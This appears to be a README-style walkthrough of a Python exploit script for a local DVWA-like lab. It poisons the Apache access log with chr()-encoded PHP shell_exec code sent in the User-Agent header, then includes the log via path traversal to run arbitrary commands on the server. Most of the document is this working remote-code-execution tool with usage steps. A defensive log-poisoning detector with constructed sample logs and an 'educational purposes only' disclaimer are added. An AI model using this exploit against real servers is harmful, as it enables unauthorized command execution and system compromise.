This Python script allows you to execute commands on a vulnerable server through a PHP shell and extract the results from the Apache2 access log. The script encodes the user input as a PHP shell command, sends it in a request made with `curl`, and then parses the Apache2 access log to extract and display the result.
```python
import re
import subprocess

import requests

command = input("Enter command: ")
```

- The script starts by prompting the user to enter a command. The entered command will be executed on the server through the PHP shell.
```python
result = "<?php echo shell_exec("
for i in command:
    result += f"chr({ord(i)})."
result = result[:-1] + ")?>"
```

- The entered command is encoded as PHP code. Each character of the input is converted to its ASCII value and wrapped in a `chr()` call; the calls are joined with `.` and the trailing `.` is dropped before the closing `)?>`. The final result is PHP shell code that executes the user input.
```python
curl_command = (
    f'curl -X GET "http://localhost/vulnerabilities/fi/?page=file1.php" '
    f'-H "User-Agent: .###START###.{result}.###END###." '
    '-H "Cookie: security_level=0; PHPSESSID=2r607gpref90ln1daitgg4nse6; security=low"'
)
```

- A `curl` command is created to send the PHP shell code to the vulnerable web application through the `User-Agent` header. The `User-Agent` header carries the encoded PHP shell code, wrapped in the `.###START###.` and `.###END###.` markers, which will be executed on the server.
```python
subprocess.run(curl_command, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
```

- The `curl` command is executed with `subprocess.run()`, which sends the crafted request to the web server. Standard output and standard error are discarded to avoid unnecessary output.
```python
url = "http://localhost/vulnerabilities/fi/?page=../../../../../../../../var/log/apache2/access.log"
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
}
cookies = {
    "security_level": "0",
    "PHPSESSID": "2r607gpref90ln1daitgg4nse6",
    "security": "low"
}
response = requests.get(url, headers=headers, cookies=cookies)
```

- The script attempts to read the Apache2 access log (`access.log`) by sending a GET request to the vulnerable web application with a path-traversal value in the `page` parameter. The request includes a custom `User-Agent` header and the session cookies so that it is processed correctly.
```python
if response.status_code == 200:
    clean_response = re.sub(r'<[^>]+>', '', response.text)
    lines = clean_response.splitlines()
    found_lines = []
```

- Once a successful response is received (HTTP status code 200), the script removes HTML tags from the response and splits the cleaned text into lines for further analysis.
```python
    for line in lines:
        if line.strip().startswith("172.17.0.1"):
            found_lines.append(line)
```

- The script scans the log lines for entries that begin with the IP address `172.17.0.1`. These are assumed to be the relevant log entries that contain the execution result of the PHP shell.
```python
    if found_lines:
        last_line = found_lines[-1]
        last_line_index = lines.index(last_line)
        if last_line_index + 1 < len(lines):
            combined_lines = lines[last_line_index:]
            full_text = "\n".join(combined_lines)
            match = re.search(r'\.###START###\.(.*?)\.###END###\.', full_text, re.DOTALL)
            if match:
                print(match.group(1).strip())
```

- Starting from the last matching log line, the script joins the remaining lines and searches them for the `###START###` and `###END###` markers that wrap the output of the PHP shell command. If they are found, it extracts and prints the result.
```python
    else:
        print("Error: No line starting with '172.17.0.1' found in the response.")
```

- If no matching lines are found, an error message is displayed to indicate that no relevant log entries were detected.
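As a defender-side counterpart to the two stages the script above relies on (PHP code planted in the `User-Agent` header, then the log file pulled in through a path traversal in the `page` parameter), here is an added detection example that is not part of the original script: it parses Apache combined-format access log lines and flags both patterns. The log lines are constructed samples, not output from a real server.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)   # PHP open tag inside a client-supplied header
TRAVERSAL = re.compile(r'\.\.[/\\]')                  # ../ or ..\ after URL-decoding
LOG_TARGET = re.compile(r'/var/log/|access\.log|error\.log', re.IGNORECASE)

# Constructed sample log lines (not from a real server): benign, poisoned header, log inclusion.
SAMPLE_LOG = [
    '172.17.0.1 - - [10/May/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '172.17.0.1 - - [10/May/2024:12:00:02 +0000] "GET /vulnerabilities/fi/?page=file1.php HTTP/1.1" 200 1024 '
    '"-" ".###START###.<?php echo shell_exec(chr(105).chr(100))?>.###END###."',
    '172.17.0.1 - - [10/May/2024:12:00:03 +0000] '
    '"GET /vulnerabilities/fi/?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 8192 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def detect_log_poisoning(log_lines):
    """Return [(line_no, [reasons])] for entries matching either stage of the attack."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these separately
        reasons = []
        # Stage 1: PHP code planted in the log through the User-Agent or Referer header
        if PHP_TAG.search(m["agent"]) or PHP_TAG.search(m["referer"]):
            reasons.append("php-tag-in-header")
        # Stage 2: the poisoned log file pulled in via a traversal in the request path
        request = unquote(m["request"])
        if TRAVERSAL.search(request) and LOG_TARGET.search(request):
            reasons.append("traversal-to-log-file")
        if reasons:
            findings.append((n, reasons))
    return findings

if __name__ == "__main__":
    for line_no, reasons in detect_log_poisoning(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(reasons)}")
```

Both findings together on the same source host within a short window are the strongest signal; either alone is still worth an alert, since the header poisoning happens before any inclusion attempt.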
Requirements:

- Python 3.x
- `requests` library (install with `pip install requests`)
Usage:

- Run the script using Python.
- Enter the command you wish to execute on the server.
- The script will attempt to execute the command and print the output extracted from the Apache2 access log.
This script is intended for educational purposes only. Do not use it on systems you do not have explicit permission to test. Unauthorized access to systems is illegal and unethical.